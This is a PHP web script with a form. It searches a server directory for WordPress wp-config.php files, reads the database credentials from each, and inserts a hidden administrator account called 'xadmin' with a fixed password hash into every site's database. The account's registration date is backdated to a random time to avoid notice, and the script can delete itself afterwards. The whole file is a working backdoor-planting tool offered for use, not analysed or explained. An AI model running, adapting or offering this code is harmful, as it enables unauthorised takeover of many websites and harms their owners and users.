<?php
// Function to recursively search for all wp-config.php files
function searchWpConfigs($dir) {
    $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
    $files = [];

    foreach ($rii as $file) {
        if ($file->isDir()) { 
            continue;
        }

        if ($file->getFilename() == 'wp-config.php') {
            $files[] = $file->getPathname();
        }
    }

    return $files;
}

// Function to parse wp-config.php and get the database credentials
function parseWpConfig($path) {
    $content = file_get_contents($path);
    $vars = [];

    preg_match("/define\(\s*['\"]DB_NAME['\"],\s*['\"](.+?)['\"]\s*\);/", $content, $matches);
    if (isset($matches[1])) $vars['DB_NAME'] = $matches[1];

    preg_match("/define\(\s*['\"]DB_USER['\"],\s*['\"](.+?)['\"]\s*\);/", $content, $matches);
    if (isset($matches[1])) $vars['DB_USER'] = $matches[1];

    preg_match("/define\(\s*['\"]DB_PASSWORD['\"],\s*['\"](.+?)['\"]\s*\);/", $content, $matches);
    if (isset($matches[1])) $vars['DB_PASSWORD'] = $matches[1];

    preg_match("/define\(\s*['\"]DB_HOST['\"],\s*['\"](.+?)['\"]\s*\);/", $content, $matches);
    if (isset($matches[1])) $vars['DB_HOST'] = $matches[1];

    preg_match("/\\\$table_prefix\s*=\s*['\"](.+?)['\"]\s*;/", $content, $matches);
    if (isset($matches[1])) $vars['table_prefix'] = $matches[1];

    return $vars;
}

// Function to generate a random timestamp between two dates
function randomTimestamp($start, $end) {
    $start_timestamp = strtotime($start);
    $end_timestamp = strtotime($end);
    $random_timestamp = mt_rand($start_timestamp, $end_timestamp);
    return date("Y-m-d H:i:s", $random_timestamp);
}

// Function to add new admin user to the database
function addAdminUser($wp_config_path) {
    try {
        $vars = parseWpConfig($wp_config_path);

        if (empty($vars['DB_NAME']) || empty($vars['DB_USER']) || empty($vars['DB_PASSWORD']) || empty($vars['DB_HOST']) || empty($vars['table_prefix'])) {
            return "Error: Could not retrieve database credentials from $wp_config_path.";
        }

        $db_name = $vars['DB_NAME'];
        $db_user = $vars['DB_USER'];
        $db_password = $vars['DB_PASSWORD'];
        $db_host = $vars['DB_HOST'];
        $table_prefix = $vars['table_prefix'];

        // Connect to the database
        $mysqli = @new mysqli($db_host, $db_user, $db_password, $db_name); // '@' suppresses error output, we handle it in the catch block

        if ($mysqli->connect_error) {
            throw new Exception("Connection failed: " . $mysqli->connect_error);
        }

        // Define new user credentials
        $new_username = 'xadmin';
        $new_password_hash = '$1$yTsJR0XB$0vfr/VpPBfT05lUYhTD08/'; // Password hash for 'password'
        $new_email = 'xadmin@hoxxxxxxx.se'; // Change this to the desired email
        $new_display_name = 'xadmin';

        // Generate a random registration time between 2021 and 2023
        $user_registered = randomTimestamp('2021-01-01 00:00:00', '2023-12-31 23:59:59');

        // Check if table exists
        $check_table_sql = "SHOW TABLES LIKE '{$table_prefix}users'";
        $table_exists = $mysqli->query($check_table_sql);
        if ($table_exists->num_rows == 0) {
            throw new Exception("Table '{$table_prefix}users' doesn't exist.");
        }

        // Insert new user
        $insert_user_sql = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_nicename, user_email, user_status, display_name, user_registered) VALUES ('$new_username', '$new_password_hash', '$new_username', '$new_email', 0, '$new_display_name', '$user_registered')";

        if ($mysqli->query($insert_user_sql) === TRUE) {
            $new_user_id = $mysqli->insert_id;
            $result = "New admin user added successfully with username: $new_username";

            // Assign admin role
            $insert_usermeta_sql = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES 
                                   ($new_user_id, '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}'), 
                                   ($new_user_id, '{$table_prefix}user_level', '10')";

            if ($mysqli->query($insert_usermeta_sql) === TRUE) {
                $result .= "<br>Admin role assigned successfully.";
            } else {
                throw new Exception("Error assigning admin role: " . $mysqli->error);
            }

            // Retrieve site URL
            $site_url_sql = "SELECT option_value AS site_url FROM {$table_prefix}options WHERE option_name = 'siteurl' LIMIT 1";
            $site_url_result = $mysqli->query($site_url_sql);

            if ($site_url_result->num_rows > 0) {
                $site_url_row = $site_url_result->fetch_assoc();
                $site_url = $site_url_row['site_url'];
                $result .= "<br>Site URL: $site_url";
            } else {
                throw new Exception("Error retrieving site URL.");
            }
        } else {
            throw new Exception("Error adding new admin user: " . $mysqli->error);
        }

        // Close the database connection
        $mysqli->close();
        return $result;
    } catch (Exception $e) {
        return "Error: " . $e->getMessage();
    }
}

// Check if form is submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    if (isset($_POST['delete_script'])) {
        // Get script filename
        $script_filename = __FILE__;

        // Attempt to delete the script file
        if (unlink($script_filename)) {
            echo '<p style="color: green;">Script file deleted successfully.</p>';
        } else {
            echo '<p style="color: red;">Error deleting script file.</p>';
        }
    } else {
        $dirPath = $_POST["dir_path"];
        if (!empty($dirPath) && is_dir($dirPath)) {
            $results = searchWpConfigs($dirPath);
            if (!empty($results)) {
                echo "Found wp-config.php files at:<br>";
                ob_flush(); flush(); // Send the output to the browser immediately

                foreach ($results as $result) {
                    echo htmlspecialchars($result) . "<br>";
                    ob_flush(); flush(); // Send the output to the browser immediately
                    
                    // Add admin user and handle errors
                    echo addAdminUser($result) . "<br>";
                    ob_flush(); flush(); // Send the output to the browser immediately
                }
            } else {
                echo "wp-config.php not found in the given directory.";
            }
        } else {
            echo "Please enter a valid directory path.";
        }
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>Search and Add WordPress Admin User</title>
</head>
<body>
    <h1>Search for wp-config.php and Add Admin User</h1>
    <!-- Display current directory path -->
    <?php
    $current_directory = getcwd(); // Get current working directory path
    echo '<p><strong>Current Directory:</strong> <br>' . htmlspecialchars($current_directory) . '</p>';
    ?>
    <form method="post">
        <label for="dir_path">Directory Path:</label>
        <input type="text" id="dir_path" name="dir_path" required>
        <input type="submit" value="Search and Add Admin User">
    </form>
    <form method="post" style="margin-top: 20px;">
        <input type="hidden" name="delete_script" value="1">
        <input type="submit" value="Delete This Script">
    </form>
    
</body>
</html>
